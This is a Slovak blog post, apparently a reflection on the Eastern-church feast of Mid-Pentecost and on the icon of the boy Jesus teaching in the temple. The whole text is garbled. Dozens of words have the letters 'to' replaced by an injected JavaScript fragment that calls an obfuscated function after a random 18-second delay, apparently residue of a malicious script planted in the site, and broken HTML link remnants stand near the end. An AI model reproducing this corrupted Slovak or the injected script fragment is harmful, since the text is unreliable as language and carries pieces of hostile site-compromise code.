Slovo

Ty vyučuješ v chráme slovo pravdy!

11. mája 2017 | Martin Mati

Prečítané: 1639x

Gréckokadom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolíci a pravoslávni dnes slávia sviadom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok Polovice Päťdesiatnice.

Na sviadom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok Paschy diskudom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toval dvanásťročný Ježiš v chráme s učiteľmi a privádzal ich do úžasu svojím porozumením Svätému písmu. Aj svojich rodičov, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torí si robili o neho starosti, priviedol do úžasu odpoveďou: „Či ste nevedeli, že sa mám zaoberať tým, čo patrí môjmu Otcovi?“ (Lk 2,41nn) Zavčasu sa v Ježišovom živote stáva viditeľným, že z neho hovorí Božia múdrosť (Mk 1,22; Lk 4,32). Dospievajúci Ježiš pociťuje svoje povolanie a chápe ho ako božskú vôľu. V chráme, „v dome svojho Otca“, káže neskôr znova a znova. Celý jeho život je službou Božiemu slovu.

Uprostred veľkonočného obdobia, v stredu štvrtého týždňa po Pasche, východná cirkev slávi sviadom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok s názvom „Polovica Päťdesiatnice“ (sviadom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok sa slávi na počesť dvoch veľkých sviatkov – Paschy a Pätdesiatnice). Evanjelium dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tohdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to dňa opisuje, ako uprostred týždňa židovského sviatku Sukot (Stánkov) vyučuje Ježiš v chráme a znova audom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toridom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tou, s kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torou káže, privádza svojich poslucháčov do úžasu. Pridom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom im vysvetľuje, že neohlasuje svoje vlastné myšlienky, ale Božiu vôľu, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torú plniť vyzýva bez škrdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov (Jn 7,14-30).

Ikona ukazuje dvanásťročného Ježiša v chráme (Lk 2,41-50). Je znázornený ako učiteľ uprostred šiestich zákonníkov. Tváre a posdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toj učiteľov zákona prezrádzajú úžas a údiv nad mladým mužom, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torý s neobyčajnou audom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toridom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tou vykladá Božie slovo.

Božie slovo je jednoznačne centrom ikony. Ježiš drží Sväté písmo vo svojej ľavej ruke. Týmdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to je jasné, že Ježiš, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torý sa už ako dospievajúci cíti zaviazaný Božej vôli, a Ježiš, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torý neskôr znova a znova hovorí o Božej vôli ako smernici pre život, je jeden a ten istý. Mária a Jozef vstúpia do miestnosti, v kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torej Ježiš diskutuje s učiteľmi, a s údivom pozorujú dianie. Musia sa – podobne ako učitelia – najskôr naučiť, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to je Ježiš: Syn Boží, z kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torého hovorí Božia múdrosť a sila a kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torý je predom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to prameňom života ľudí.

Veľkonočné udalosti preukázali, že Ježiš je skudom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}točne prameňom života ľudí. Deň „Polovica Päťdesiatnice“ reflektuje na bohoslužbách veľkonočné dianie a jeho následok pre ľudstvo. Ježiš je Syn Boží, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torý nielenže káže o vôli svojho Otca, ale ju aj úplne žije. Jeho pokrmom je plniť túdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to vôľu (Jn 4,34). Trpel a nechal sa ukrižovať, aby svojou smrťou vykúpil ľudí. Jeho slová – a s nimi aj jeho príklad – sú skudom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}točne „vodou života“, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torú ponúka všetkým túžiacim po živote.

Farizeji a zákonníci sa napriek dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomu uzavreli pred Ježišom. Síce žasnú nad jeho slovami a audom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toridom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tou, no napriek dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomu ich odmietajú, a predom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to nenachádzajú cestu k pravému životu. Tým, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torí veria alebo by chceli veriť – na obraze ich môžeme vidieť zastúpených Máriou a Jozefom –, sľubuje život v plnosti, život so zmyslom a cieľom. Ako sa dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to formuluje na utierni sviatk
u, Ježiš im sľubuje, že budú čerpať z hĺbky prúdov jeho učenia a budú s ním oslávení, uhasia oheň omylu a už nikdy nebudú smädní, nebudú blúdiť v tme, ale dosiahnu svetlo nesmrteľného života, lebo on je „prúd Božej slávy a príliv zmilovania, svetu darúva odpustenie, odplavuje chyby a očisťuje od chorôb. Zachraňuje tých, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torí oslavujú jeho zmŕtvychvstanie, a ochraňuje tých, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torí s láskou uctievajú jeho vstup do slávy, a udeľuje našim dušiam pokoj a veľké milosrdenstvo“ (Utiereň zo štvrtka 4. týždňa po Pasche).

dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toj.sk/23676/ty-vyucujes-v-chrame-slovo-pravdy“>

Počas týždňov veľkonočného obdobia by malo byť stále jasnejšie, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to je Ježiš pre nás. Uprostred týchdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to dní nás Ježiš stavia pred otázku, či ho – v protiklade k ľuďom z Jeruzalema – uznávame ako Božieho posla a chceme s ním žiť v úzkom spojení. Silu k dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomu dostaneme skrze Svätého Ducha, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torý zostúpi na záver sviatku Paschy, na Päťdesiatnicu. Nielenže dodá isdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totu o Ježišovom tajomstve, ale aj odvahu vydávať svedectvo o ňom a jeho učení (Jn 14,26; 15,26).

Aj keď je nám dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to všetko – prinajmenšom podľa litery – známe, robíme veľmi dobre, keď sa znova a znova nanovo usilujeme o život v Duchu Ježiša Krista a tým stále hlbšie vrastáme do jeho plnosti: „Predom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tože sme osvietení zmŕtvychvstaním Krista, Spasiteľa, a dospeli sme do stredu Pánovho sviatku, naozaj dodržiavajme Božie príkazy, aby sme sa stali hodnými aj jeho nanebovstúpenia a mali účasť na zostúpení Svätého Ducha“ (utiereň).

dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toj.sk/23676/ty-vyucujes-v-chrame-slovo-pravdy“>
dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor-content „> zdroj: https://svetkrestanstva.posdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toj.sk/23676/ty-vyucujes-v-chrame-slovo-pravdy